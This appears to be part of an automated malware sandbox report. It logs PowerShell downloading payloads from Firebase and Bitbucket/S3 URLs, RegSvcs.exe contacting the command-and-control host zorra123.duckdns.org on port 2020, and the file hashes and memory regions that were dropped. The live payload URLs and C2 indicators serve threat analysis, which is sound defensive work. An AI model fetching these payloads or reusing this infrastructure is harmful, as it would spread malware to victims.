      GET /d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315 HTTP/1.1
      Host: bbuseruploads.s3.amazonaws.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      x-amz-id-2: 0dpz9laXYq88RMFzDV78yIb9hpdQ6wwqn1RuceT7BCXLuLTPjWf1d+3oXgeMUccf5YQBUoJnqPw=
      x-amz-request-id: GZH6QFC5Z1XG7HJE
      Date: Fri, 09 Aug 2024 01:27:28 GMT
      Last-Modified: Tue, 06 Aug 2024 17:22:59 GMT
      ETag: "aabd1a604f1a4028c9aed366338df3d0"
      x-amz-server-side-encryption: AES256
      x-amz-version-id: qJpdLnwvfTZhq5WLC.X4QTcIdjWQ3Hyy
      Content-Disposition: attachment; filename="envionuevo.txt"
      Accept-Ranges: bytes
      Content-Type: text/plain
      Server: AmazonS3
      Content-Length: 64856
    • flag-us
      DNS
      9.141.166.185.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      9.141.166.185.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      225.165.217.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      225.165.217.52.in-addr.arpa
      IN PTR
      Response
      225.165.217.52.in-addr.arpa
      IN PTR
      s3-1-w amazonawscom
    • flag-us
      DNS
      zorra123.duckdns.org
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      zorra123.duckdns.org
      IN A
      Response
      zorra123.duckdns.org
      IN A
      181.235.3.72
    • flag-us
      DNS
      72.3.235.181.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      72.3.235.181.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      86.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      86.23.85.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      18.31.95.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      18.31.95.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.214.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.214.232.199.in-addr.arpa
      IN PTR
      Response
    • 172.217.168.202:443
      https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362
      tls, http
      powershell.exe
      1.9kB
      48.5kB
      26
      41

      HTTP Request

      GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe

      HTTP Response

      200

      HTTP Request

      GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362

      HTTP Response

      200
    • 204.79.197.237:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=
      tls, http2
      2.0kB
      9.3kB
      22
      19

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=

      HTTP Response

      204
    • 185.166.141.9:443
      https://bitbucket.org/dcasdc/descargas/downloads/envionuevo.txt
      tls, http
      powershell.exe
      803 B
      8.7kB
      9
      11

      HTTP Request

      GET https://bitbucket.org/dcasdc/descargas/downloads/envionuevo.txt

      HTTP Response

      302
    • 52.217.165.225:443
      https://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315
      tls, http
      powershell.exe
      3.2kB
      73.7kB
      36
      64

      HTTP Request

      GET https://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315

      HTTP Response

      200
    • 181.235.3.72:2020
      zorra123.duckdns.org
      tls
      RegSvcs.exe
      7.0kB
      6.0kB
      62
      60
    • 8.8.8.8:53
      firebasestorage.googleapis.com
      dns
      powershell.exe
      76 B
      220 B
      1
      1

      DNS Request

      firebasestorage.googleapis.com

      DNS Response

      172.217.168.202
      142.251.39.106
      142.250.179.138
      172.217.23.202
      142.250.179.170
      142.251.36.42
      142.251.36.10
      142.250.179.202
      216.58.214.10

    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
      151 B
      1
      1

      DNS Request

      g.bing.com

      DNS Response

      204.79.197.237
      13.107.21.237

    • 8.8.8.8:53
      202.168.217.172.in-addr.arpa
      dns
      74 B
      113 B
      1
      1

      DNS Request

      202.168.217.172.in-addr.arpa

    • 8.8.8.8:53
      20.160.190.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      20.160.190.20.in-addr.arpa

    • 8.8.8.8:53
      237.197.79.204.in-addr.arpa
      dns
      73 B
      143 B
      1
      1

      DNS Request

      237.197.79.204.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
      144 B
      1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      172.210.232.199.in-addr.arpa
      dns
      74 B
      128 B
      1
      1

      DNS Request

      172.210.232.199.in-addr.arpa

    • 8.8.8.8:53
      bitbucket.org
      dns
      powershell.exe
      59 B
      107 B
      1
      1

      DNS Request

      bitbucket.org

      DNS Response

      185.166.141.9
      185.166.141.8
      185.166.141.7

    • 8.8.8.8:53
      bbuseruploads.s3.amazonaws.com
      dns
      powershell.exe
      76 B
      254 B
      1
      1

      DNS Request

      bbuseruploads.s3.amazonaws.com

      DNS Response

      52.217.165.225
      52.216.29.148
      3.5.30.67
      52.216.52.161
      3.5.28.116
      3.5.28.213
      3.5.29.163
      3.5.2.158

    • 8.8.8.8:53
      9.141.166.185.in-addr.arpa
      dns
      72 B
      132 B
      1
      1

      DNS Request

      9.141.166.185.in-addr.arpa

    • 8.8.8.8:53
      225.165.217.52.in-addr.arpa
      dns
      73 B
      107 B
      1
      1

      DNS Request

      225.165.217.52.in-addr.arpa

    • 8.8.8.8:53
      zorra123.duckdns.org
      dns
      RegSvcs.exe
      66 B
      82 B
      1
      1

      DNS Request

      zorra123.duckdns.org

      DNS Response

      181.235.3.72

    • 8.8.8.8:53
      72.3.235.181.in-addr.arpa
      dns
      71 B
      137 B
      1
      1

      DNS Request

      72.3.235.181.in-addr.arpa

    • 8.8.8.8:53
      86.23.85.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      86.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      18.31.95.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      18.31.95.13.in-addr.arpa

    • 8.8.8.8:53
      172.214.232.199.in-addr.arpa
      dns
      74 B
      128 B
      1
      1

      DNS Request

      172.214.232.199.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      f41839a3fe2888c8b3050197bc9a0a05

      SHA1

      0798941aaf7a53a11ea9ed589752890aee069729

      SHA256

      224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

      SHA512

      2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      64B

      MD5

      50a8221b93fbd2628ac460dd408a9fc1

      SHA1

      7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

      SHA256

      46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

      SHA512

      27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yifzslca.q3b.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/436-24-0x0000000000400000-0x0000000000412000-memory.dmp

      Filesize

      72KB

    • memory/436-33-0x0000000005D20000-0x0000000005D86000-memory.dmp

      Filesize

      408KB

    • memory/436-32-0x0000000006260000-0x0000000006804000-memory.dmp

      Filesize

      5.6MB

    • memory/436-31-0x0000000005C10000-0x0000000005CAC000-memory.dmp

      Filesize

      624KB

    • memory/512-23-0x00000275F82F0000-0x00000275F82FA000-memory.dmp

      Filesize

      40KB

    • memory/512-22-0x00000275F82E0000-0x00000275F82E8000-memory.dmp

      Filesize

      32KB

    • memory/4848-0-0x00007FFA3B153000-0x00007FFA3B155000-memory.dmp

      Filesize

      8KB

    • memory/4848-30-0x00007FFA3B150000-0x00007FFA3BC11000-memory.dmp

      Filesize

      10.8MB

    • memory/4848-12-0x00007FFA3B150000-0x00007FFA3BC11000-memory.dmp

      Filesize

      10.8MB

    • memory/4848-11-0x00007FFA3B150000-0x00007FFA3BC11000-memory.dmp

      Filesize

      10.8MB

    • memory/4848-1-0x000002A928C40000-0x000002A928C62000-memory.dmp

      Filesize

      136KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.